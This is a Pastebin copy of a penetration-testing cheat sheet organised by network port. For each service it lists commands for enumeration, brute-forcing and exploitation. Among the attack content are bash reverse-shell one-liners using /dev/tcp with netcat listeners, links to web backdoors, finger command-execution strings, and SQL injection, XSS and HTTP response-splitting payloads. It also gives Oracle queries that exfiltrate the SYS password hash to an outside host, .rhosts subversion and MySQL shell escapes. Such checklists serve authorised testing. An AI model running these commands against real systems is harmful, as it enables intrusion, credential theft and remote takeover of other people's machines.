Guest User

Untitled

a guest
Mar 16th, 2018
536
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 24.32 KB | None | 0 0
  1. Enumeration
  2. FTP port 21 open
  3. Fingerprint server
  4. telnet ip_address 21 (Banner grab)
  5. Run command ftp ip_address
  6. Check for anonymous access
  7. ftp ip_addressUsername: anonymous OR anonPassword: [email protected]
  8. Password guessing
  9. Hydra brute force
  10. medusa
  11. Brutus
  12. Examine configuration files
  13. ftpusers
  14. ftp.conf
  15. proftpd.conf
  16. MiTM
  17. pasvagg.pl
  18. SSH port 22 open
  19. Fingerprint server
  20. telnet ip_address 22 (banner grab)
  21. scanssh
  22. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
  23. Password guessing
  24. ssh root@ip_address
  25. guess-who
  26. ./b -l username -h ip_address -p 22 -2 < password_file_location
  27. Hydra brute force
  28. brutessh
  29. Ruby SSH Bruteforcer
  30. Examine configuration files
  31. ssh_config
  32. sshd_config
  33. authorized_keys
  34. ssh_known_hosts
  35. .shosts
  36. SSH Client programs
  37. tunnelier
  38. winsshd
  39. putty
  40. winscp
  41. Telnet port 23 open
  42. Fingerprint server
  43. telnet ip_address
  44. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
  45. telnetfp
  46. Password Attack
  47. Common passwords
  48. Hydra brute force
  49. Brutus
  50. telnet -l "-froot" hostname (Solaris 10+)
  51. Examine configuration files
  52. /etc/inetd.conf
  53. /etc/xinetd.d/telnet
  54. /etc/xinetd.d/stelnet
  55. Sendmail Port 25 open
  56. Fingerprint server
  57. telnet ip_address 25 (banner grab)
  58. Mail Server Testing
  59. Enumerate users
  60. VRFY username (verifies if username exists - enumeration of accounts)
  61. EXPN username (verifies if username is valid - enumeration of accounts)
  62. Mail Spoof Test
  63. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
  64. Mail Relay Test
  65. HELO anything
  66. Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
  67. Unknown domain - mail from: <user@unknown_domain>
  68. Domain not present - mail from: <user@localhost>
  69. Domain not supplied - mail from: <user>
  70. Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
  71. Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
  72. Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
  73. User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
  74. Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
  75. Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
  76. Examine Configuration Files
  77. sendmail.cf
  78. submit.cf
  79. DNS port 53 open
  80. Fingerprint server/ service
  81. host
  82. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
  83. nslookup
  84. nslookup [ -option ... ] [ host-to-find | - [ server ]]
  85. dig
  86. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
  87. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
  88. DNS Enumeration
  89. Bile Suite
  90. perl BiLE.pl [website] [project_name]
  91. perl BiLE-weigh.pl [website] [input file]
  92. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
  93. perl vet-mx.pl [input file] [true domain file] [output file]
  94. perl exp-tld.pl [input file] [output file]
  95. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
  96. perl qtrace.pl [ip_address_file] [output_file]
  97. perl jarf-rev [subnetblock] [nameserver]
  98. txdns
  99. txdns -rt -t domain_name
  100. txdns -x 50 -bb domain_name
  101. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
  102. Examine Configuration Files
  103. host.conf
  104. resolv.conf
  105. named.conf
  106. TFTP port 69 open
  107. TFTP Enumeration
  108. tftp ip_address PUT local_file
  109. tftp ip_address GET conf.txt (or other files)
  110. Solarwinds TFTP server
  111. tftp – i <IP> GET /etc/passwd (old Solaris)
  112. TFTP Bruteforcing
  113. TFTP bruteforcer
  114. Cisco-Torch
  115. Finger Port 79 open
  116. User enumeration
  117. finger 'a b c d e f g h' @example.com
  118. finger **@example.com
  119. finger @example.com
  120. Command execution
  121. finger "|/bin/[email protected]"
  122. finger "|/bin/ls -a /@example.com"
  123. Finger Bounce
  124. finger user@host@victim
  125. finger @internal@external
  126. Web Ports 80, 8080 etc. open
  127. Fingerprint server
  128. Telnet ip_address port
  129. Firefox plugins
  130. All
  131. firecat
  132. Specific
  133. add n edit cookies
  134. asnumber
  135. header spy
  136. live http headers
  137. shazou
  138. web developer
  139. Crawl website
  140. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
  141. httprint
  142. Metagoofil
  143. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
  144. Web Directory enumeration
  145. Nikto
  146. nikto [-h target] [options]
  147. DirBuster
  148. Wikto
  149. Goolag Scanner
  150. Vulnerability Assessment
  151. Manual Tests
  152. Default Passwords
  153. Install Backdoors
  154. ASP
  155. http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
  156. Assorted
  157. http://michaeldaw.org/projects/web-backdoor-compilation/
  158. http://open-labs.org/hacker_webkit02.tar.gz
  159. Perl
  160. http://home.arcor.de/mschierlm/test/pmsh.pl
  161. http://pentestmonkey.net/tools/perl-reverse-shell/
  162. http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
  163. PHP
  164. http://php.spb.ru/remview/
  165. http://pentestmonkey.net/tools/php-reverse-shell/
  166. http://pentestmonkey.net/tools/php-findsock-shell/
  167. Python
  168. http://matahari.sourceforge.net/
  169. TCL
  170. http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
  171. Bash Connect Back Shell
  172. GnuCitizen
  173. Atttack Box: nc -l -p Port -vvv
  174. Victim: $ exec 5<>/dev/tcp/IP_Address/Port
  175. Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
  176. Neohapsis
  177. Atttack Box: nc -l -p Port -vvv
  178. Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
  179. Victim: $ exec 1>&0 # Next we copy stdin to stdout
  180. Victim: $ exec 2>&0 # And finally stdin to stderr
  181. Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
  182. Method Testing
  183. nc IP_Adress Port
  184. HEAD / HTTP/1.0
  185. OPTIONS / HTTP/1.0
  186. PROPFIND / HTTP/1.0
  187. TRACE / HTTP/1.1
  188. PUT http://Target_URL/FILE_NAME
  189. POST http://Target_URL/FILE_NAME HTTP/1.x
  190. Upload Files
  191. curl
  192. curl -u <username:password> -T file_to_upload <Target_URL>
  193. curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
  194. put.pl
  195. put.pl -h target -r /remote_file_name -f local_file_name
  196. webdav
  197. cadaver
  198. View Page Source
  199. Hidden Values
  200. Developer Remarks
  201. Extraneous Code
  202. Passwords!
  203. Input Validation Checks
  204. NULL or null
  205. Possible error messages returned.
  206. ' , " , ; , <!
  207. Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
  208. – , = , + , "
  209. Used to craft SQL Injection queries.
  210. ‘ , &, ! , ¦ , < , >
  211. Used to find command execution vulnerabilities.
  212. "><script>alert(1)</script>
  213. Basic Cross-Site Scripting Checks.
  214. %0d%0a
  215. Carriage Return (%0d) Line Feed (%0a)
  216. HTTP Splitting
  217. language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
  218. i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>
  219. Cache Poisoning
  220. language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
  221. %7f , %ff
  222. byte-length overflows; maximum 7- and 8-bit values.
  223. -1, other
  224. Integer and underflow vulnerabilities.
  225. %n , %x , %s
  226. Testing for format string vulnerabilities.
  227. ../
  228. Directory Traversal Vulnerabilities.
  229. % , _, *
  230. Wildcard characters can sometimes present DoS issues or information disclosure.
  231. Ax1024+
  232. Overflow vulnerabilities.
  233. Automated table and column iteration
  234. orderby.py
  235. ./orderby.py www.site.com/index.php?id=
  236. d3sqlfuzz.py
  237. ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
  238. Vulnerability Scanners
  239. Acunetix
  240. Grendelscan
  241. NStealth
  242. Obiwan III
  243. w3af
  244. Specific Applications/ Server Tools
  245. Domino
  246. dominoaudit
  247. dominoaudit.pl [options] -h <IP>
  248. Joomla
  249. cms_few
  250. ./cms.py <site-name>
  251. joomsq
  252. ./joomsq.py <IP>
  253. joomlascan
  254. ./joomlascan.py <site> <options> [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don't show 404 responses]
  255. joomscan
  256. ./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
  257. jscan
  258. jscan.pl -f hostname
  259. (shell.txt required)
  260. aspaudit.pl
  261. asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
  262. Vbulletin
  263. vbscan.py
  264. vbscan.py <host> <port> -v
  265. vbscan.py -update
  266. ZyXel
  267. zyxel-bf.sh
  268. snmpwalk
  269. snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
  270. snmpget
  271. snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
  272. Proxy Testing
  273. Burpsuite
  274. Crowbar
  275. Interceptor
  276. Paros
  277. Requester Raw
  278. Suru
  279. WebScarab
  280. Examine configuration files
  281. Generic
  282. Examine httpd.conf/ windows config files
  283. JBoss
  284. JMX Console http://<IP>:8080/jmxconcole/
  285. War File
  286. Joomla
  287. configuration.php
  288. diagnostics.php
  289. joomla.inc.php
  290. config.inc.php
  291. Mambo
  292. configuration.php
  293. config.inc.php
  294. Wordpress
  295. setup-config.php
  296. wp-config.php
  297. ZyXel
  298. /WAN.html (contains PPPoE ISP password)
  299. /WLAN_General.html and /WLAN.html (contains WEP key)
  300. /rpDyDNS.html (contains DDNS credentials)
  301. /Firewall_DefPolicy.html (Firewall)
  302. /CF_Keyword.html (Content Filter)
  303. /RemMagWWW.html (Remote MGMT)
  304. /rpSysAdmin.html (System)
  305. /LAN_IP.html (LAN)
  306. /NAT_General.html (NAT)
  307. /ViewLog.html (Logs)
  308. /rpFWUpload.html (Tools)
  309. /DiagGeneral.html (Diagnostic)
  310. /RemMagSNMP.html (SNMP Passwords)
  311. /LAN_ClientList.html (Current DHCP Leases)
  312. Config Backups
  313. /RestoreCfg.html
  314. /BackupCfg.html
  315. Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
  316. ZyXEL Config Reader
  317. Examine web server logs
  318. c:\winnt\system32\Logfiles\W3SVC1
  319. awk -F " " '{print $3,$11} filename | sort | uniq
  320. References
  321. White Papers
  322. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
  323. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
  324. Blind Security Testing - An Evolutionary Approach
  325. Command Injection in XML Signatures and Encryption
  326. Input Validation Cheat Sheet
  327. SQL Injection Cheat Sheet
  328. Books
  329. Hacking Exposed Web 2.0
  330. Hacking Exposed Web Applications
  331. The Web Application Hacker's Handbook
  332. Exploit Frameworks
  333. Brute-force Tools
  334. Acunetix
  335. Metasploit
  336. w3af
  337. Portmapper port 111 open
  338. rpcdump.py
  339. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
  340. rpcinfo
  341. rpcinfo [options] IP_Address
  342. NTP Port 123 open
  343. NTP Enumeration
  344. ntpdc -c monlist IP_ADDRESS
  345. ntpdc -c sysinfo IP_ADDRESS
  346. ntpq
  347. host
  348. hostname
  349. ntpversion
  350. readlist
  351. version
  352. Examine configuration files
  353. ntp.conf
  354. NetBIOS Ports 135-139,445 open
  355. NetBIOS enumeration
  356. Enum
  357. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
  358. Null Session
  359. net use \\192.168.1.1\ipc$ "" /u:""
  360. net view \\ip_address
  361. Dumpsec
  362. Smbclient
  363. smbclient -L //server/share password options
  364. Superscan
  365. Enumeration tab.
  366. user2sid/sid2user
  367. Winfo
  368. NetBIOS brute force
  369. Hydra
  370. Brutus
  371. Cain & Abel
  372. getacct
  373. NAT (NetBIOS Auditing Tool)
  374. Examine Configuration Files
  375. Smb.conf
  376. lmhosts
  377. SNMP port 161 open
  378. Default Community Strings
  379. public
  380. private
  381. cisco
  382. cable-docsis
  383. ILMI
  384. MIB enumeration
  385. Windows NT
  386. .1.3.6.1.2.1.1.5 Hostnames
  387. .1.3.6.1.4.1.77.1.4.2 Domain Name
  388. .1.3.6.1.4.1.77.1.2.25 Usernames
  389. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
  390. .1.3.6.1.4.1.77.1.2.27 Share Information
  391. Solarwinds MIB walk
  392. Getif
  393. snmpwalk
  394. snmpwalk -v <Version> -c <Community string> <IP>
  395. Snscan
  396. Applications
  397. ZyXel
  398. snmpget -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2.6.0
  399. snmpwalk -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2
  400. SNMP Bruteforce
  401. onesixtyone
  402. onesixytone -c SNMP.wordlist <IP>
  403. cat
  404. ./cat -h <IP> -w SNMP.wordlist
  405. Solarwinds SNMP Brute Force
  406. ADMsnmp
  407. Examine SNMP Configuration files
  408. snmp.conf
  409. snmpd.conf
  410. snmp-config.xml
  411. LDAP Port 389 Open
  412. ldap enumeration
  413. ldapminer
  414. ldapminer -h ip_address -p port (not required if default) -d
  415. luma
  416. Gui based tool
  417. ldp
  418. Gui based tool
  419. openldap
  420. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
  421. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
  422. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
  423. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
  424. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
  425. ldap brute force
  426. bf_ldap
  427. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
  428. K0ldS
  429. LDAP_Brute.pl
  430. Examine Configuration Files
  431. General
  432. containers.ldif
  433. ldap.cfg
  434. ldap.conf
  435. ldap.xml
  436. ldap-config.xml
  437. ldap-realm.xml
  438. slapd.conf
  439. IBM SecureWay V3 server
  440. V3.sas.oc
  441. Microsoft Active Directory server
  442. msadClassesAttrs.ldif
  443. Netscape Directory Server 4
  444. nsslapd.sas_at.conf
  445. nsslapd.sas_oc.conf
  446. OpenLDAP directory server
  447. slapd.sas_at.conf
  448. slapd.sas_oc.conf
  449. Sun ONE Directory Server 5.1
  450. 75sas.ldif
  451. PPTP/L2TP/VPN port 500/1723 open
  452. Enumeration
  453. ike-scan
  454. ike-probe
  455. Brute-Force
  456. ike-crack
  457. Reference Material
  458. PSK cracking paper
  459. SecurityFocus Infocus
  460. Scanning a VPN Implementation
  461. Modbus port 502 open
  462. modscan
  463. rlogin port 513 open
  464. Rlogin Enumeration
  465. Find the files
  466. find / -name .rhosts
  467. locate .rhosts
  468. Examine Files
  469. cat .rhosts
  470. Manual Login
  471. rlogin hostname -l username
  472. rlogin <IP>
  473. Subvert the files
  474. echo ++ > .rhosts
  475. Rlogin Brute force
  476. Hydra
  477. rsh port 514 open
  478. Rsh Enumeration
  479. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
  480. Rsh Brute Force
  481. rsh-grind
  482. Hydra
  483. medusa
  484. SQL Server Port 1433 1434 open
  485. SQL Enumeration
  486. piggy
  487. SQLPing
  488. sqlping ip_address/hostname
  489. SQLPing2
  490. SQLPing3
  491. SQLpoke
  492. SQL Recon
  493. SQLver
  494. SQL Brute Force
  495. SQLPAT
  496. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
  497. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
  498. SQL Dict
  499. SQLAT
  500. Hydra
  501. SQLlhf
  502. ForceSQL
  503. Citrix port 1494 open
  504. Citrix Enumeration
  505. Default Domain
  506. Published Applications
  507. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
  508. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
  509. Citrix Brute Force
  510. bforce.js
  511. connect.js
  512. Citrix Brute-forcer
  513. Reference Material
  514. Hacking Citrix - the legitimate backdoor
  515. Hacking Citrix - the forceful way
  516. Oracle Port 1521 Open
  517. Oracle Enumeration
  518. oracsec
  519. Repscan
  520. Sidguess
  521. Scuba
  522. DNS/HTTP Enumeration
  523. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
  524. SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
  525. WinSID
  526. Oracle default password list
  527. TNSVer
  528. tnsver host [port]
  529. TCP Scan
  530. Oracle TNSLSNR
  531. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
  532. TNSCmd
  533. perl tnscmd.pl -h ip_address
  534. perl tnscmd.pl version -h ip_address
  535. perl tnscmd.pl status -h ip_address
  536. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
  537. LSNrCheck
  538. Oracle Security Check (needs credentials)
  539. OAT
  540. sh opwg.sh -s ip_address
  541. opwg.bat -s ip_address
  542. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
  543. OScanner
  544. sh oscanner.sh -s ip_address
  545. oscanner.exe -s ip_address
  546. sh reportviewer.sh oscanner_saved_file.xml
  547. reportviewer.exe oscanner_saved_file.xml
  548. NGS Squirrel for Oracle
  549. Service Register
  550. Service-register.exe ip_address
  551. PLSQL Scanner 2008
  552. Oracle Brute Force
  553. OAK
  554. ora-getsid hostname port sid_dictionary_list
  555. ora-auth-alter-session host port sid username password sql
  556. ora-brutesid host port start
  557. ora-pwdbrute host port sid username password-file
  558. ora-userenum host port sid userlistfile
  559. ora-ver -e (-f -l -a) host port
  560. breakable (Targets Application Server Port)
  561. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
  562. SQLInjector (Targets Application Server Port)
  563. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
  564. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
  565. Check Password
  566. orabf
  567. orabf [hash]:[username] [options]
  568. thc-orakel
  569. Cracker
  570. Client
  571. Crypto
  572. DBVisualisor
  573. Sql scripts from pentest.co.uk
  574. Manual sql input of previously reported vulnerabilties
  575. Oracle Reference Material
  576. Understanding SQL Injection
  577. SQL Injection walkthrough
  578. SQL Injection by example
  579. Advanced SQL Injection in Oracle databases
  580. Blind SQL Injection
  581. SQL Cheatsheets
  582. http://ha.ckers.org/sqlinjection
  583. http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
  584. http://www.0x000000.com/?i=14
  585. http://pentestmonkey.net/
  586. NFS Port 2049 open
  587. NFS Enumeration
  588. showmount -e hostname/ip_address
  589. mount -t nfs ip_address:/directory_found_exported /local_mount_point
  590. NFS Brute Force
  591. Interact with NFS share and try to add/delete
  592. Exploit and Confuse Unix
  593. Examine Configuration Files
  594. /etc/exports
  595. /etc/lib/nfs/xtab
  596. Compaq/HP Insight Manager Port 2301,2381open
  597. HP Enumeration
  598. Authentication Method
  599. Host OS Authentication
  600. Default Authentication
  601. Default Passwords
  602. Wikto
  603. Nstealth
  604. HP Bruteforce
  605. Hydra
  606. Acunetix
  607. Examine Configuration Files
  608. path.properties
  609. mx.log
  610. CLIClientConfig.cfg
  611. database.props
  612. pg_hba.conf
  613. jboss-service.xml
  614. .namazurc
  615. MySQL port 3306 open
  616. Enumeration
  617. nmap -A -n -p3306 <IP Address>
  618. nmap -A -n -PN --script:ALL -p3306 <IP Address>
  619. telnet IP_Address 3306
  620. use test; select * from test;
  621. To check for other DB's -- show databases
  622. Administration
  623. MySQL Network Scanner
  624. MySQL GUI Tools
  625. mysqlshow
  626. mysqlbinlog
  627. Manual Checks
  628. Default usernames and passwords
  629. username: root password:
  630. testing
  631. mysql -h <Hostname> -u root
  632. mysql -h <Hostname> -u root
  633. mysql -h <Hostname> -u root@localhost
  634. mysql -h <Hostname>
  635. mysql -h <Hostname> -u ""@localhost
  636. Configuration Files
  637. Operating System
  638. windows
  639. config.ini
  640. my.ini
  641. windows\my.ini
  642. winnt\my.ini
  643. <InstDir>/mysql/data/
  644. unix
  645. my.cnf
  646. /etc/my.cnf
  647. /etc/mysql/my.cnf
  648. /var/lib/mysql/my.cnf
  649. ~/.my.cnf
  650. /etc/my.cnf
  651. Command History
  652. ~/.mysql.history
  653. Log Files
  654. connections.log
  655. update.log
  656. common.log
  657. To run many sql commands at once -- mysql -u username -p < manycommands.sql
  658. MySQL data directory (Location specified in my.cnf)
  659. Parent dir = data directory
  660. mysql
  661. test
  662. information_schema (Key information in MySQL)
  663. Complete table list -- select table_schema,table_name from tables;
  664. Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;
  665. File privileges -- select user,file_priv from mysql.user where user='root';
  666. Version -- select version();
  667. Load a specific file -- SELECT LOAD_FILE('FILENAME');
  668. SSL Check
  669. mysql> show variables like 'have_openssl';
  670. If there's no rows returned at all it means the the distro itself doesn't support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn't started with ssl and can be easily fixed.
  671. Privilege Escalation
  672. Current Level of access
  673. mysql>select user();
  674. mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
  675. Access passwords
  676. mysql> use mysql
  677. mysql> select user,password from user;
  678. Create a new user and grant him privileges
  679. mysql>create user test identified by 'test';
  680. mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
  681. Break into a shell
  682. mysql> \! cat /etc/passwd
  683. mysql> \! bash
  684. SQL injection
  685. mysql-miner.pl
  686. mysql-miner.pl http://target/ expected_string database
  687. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
  688. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
  689. References.
  690. Design Weaknesses
  691. MySQL running as root
  692. Exposed publicly on Internet
  693. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
  694. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
  695. RDesktop port 3389 open
  696. Rdesktop Enumeration
  697. Remote Desktop Connection
  698. Rdestop Bruteforce
  699. TSGrinder
  700. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
  701. Tscrack
  702. Sybase Port 5000+ open
  703. Sybase Enumeration
  704. sybase-version ip_address from NGS
  705. Sybase Vulnerability Assessment
  706. Use DBVisualiser
  707. Sybase Security checksheet
  708. Copy output into excel spreadsheet
  709. Evaluate mis-configured parameters
  710. Manual sql input of previously reported vulnerabilties
  711. Advanced SQL Injection in SQL Server
  712. More Advanced SQL Injection
  713. NGS Squirrel for Sybase
  714. SIP Port 5060 open
  715. SIP Enumeration
  716. netcat
  717. nc IP_Address Port
  718. sipflanker
  719. python sipflanker.py 192.168.1-254
  720. Sipscan
  721. smap
  722. smap IP_Address/Subnet_Mask
  723. smap -o IP_Address/Subnet_Mask
  724. smap -l IP_Address
  725. SIP Packet Crafting etc.
  726. sipsak
  727. Tracing paths: - sipsak -T -s sip:usernaem@domain
  728. Options request:- sipsak -vv -s sip:username@domain
  729. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
  730. siprogue
  731. SIP Vulnerability Scanning/ Brute Force
  732. tftp bruteforcer
  733. Default dictionary file
  734. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
  735. VoIPaudit
  736. SiVuS
  737. Examine Configuration Files
  738. SIPDefault.cnf
  739. asterisk.conf
  740. sip.conf
  741. phone.conf
  742. sip_notify.conf
  743. <Ethernet address>.cfg
  744. 000000000000.cfg
  745. phone1.cfg
  746. sip.cfg etc. etc.
  747. VNC port 5900^ open
  748. VNC Enumeration
  749. Scans
  750. 5900^ for direct access.5800 for HTTP access.
  751. VNC Brute Force
  752. Password Attacks
  753. Remote
  754. Password Guess
  755. vncrack
  756. Password Crack
  757. vncrack
  758. Packet Capture
  759. Phosshttp://www.phenoelit.de/phoss
  760. Local
  761. Registry Locations
  762. \HKEY_CURRENT_USER\Software\ORL\WinVNC3
  763. \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
  764. Decryption Key
  765. 0x238210763578887
  766. Exmine Configuration Files
  767. .vnc
  768. /etc/vnc/config
  769. $HOME/.vnc/config
  770. /etc/sysconfig/vncservers
  771. /etc/vnc.conf
  772. X11 port 6000^ open
  773. X11 Enumeration
  774. List open windows
  775. Authentication Method
  776. Xauth
  777. Xhost
  778. X11 Exploitation
  779. xwd
  780. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
  781. Keystrokes
  782. Received
  783. Transmitted
  784. Screenshots
  785. xhost +
  786. Examine Configuration Files
  787. /etc/Xn.hosts
  788. /usr/lib/X11/xdm
  789. Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"
  790. /usr/lib/X11/xdm/xsession
  791. /usr/lib/X11/xdm/xsession-remote
  792. /usr/lib/X11/xdm/xsession.0
  793. /usr/lib/X11/xdm/xdm-config
  794. DisplayManager*authorize:on
  795. Tor Port 9001, 9030 open
  796. Tor Node Checker
  797. Ip Pages
  798. Kewlio.net
  799. nmap NSE script
  800. Jet Direct 9100 open
  801. hijetta
  802. 0DaySecurity.com © 2009. All Rights Reserved
Add Comment
Please, Sign In to add comment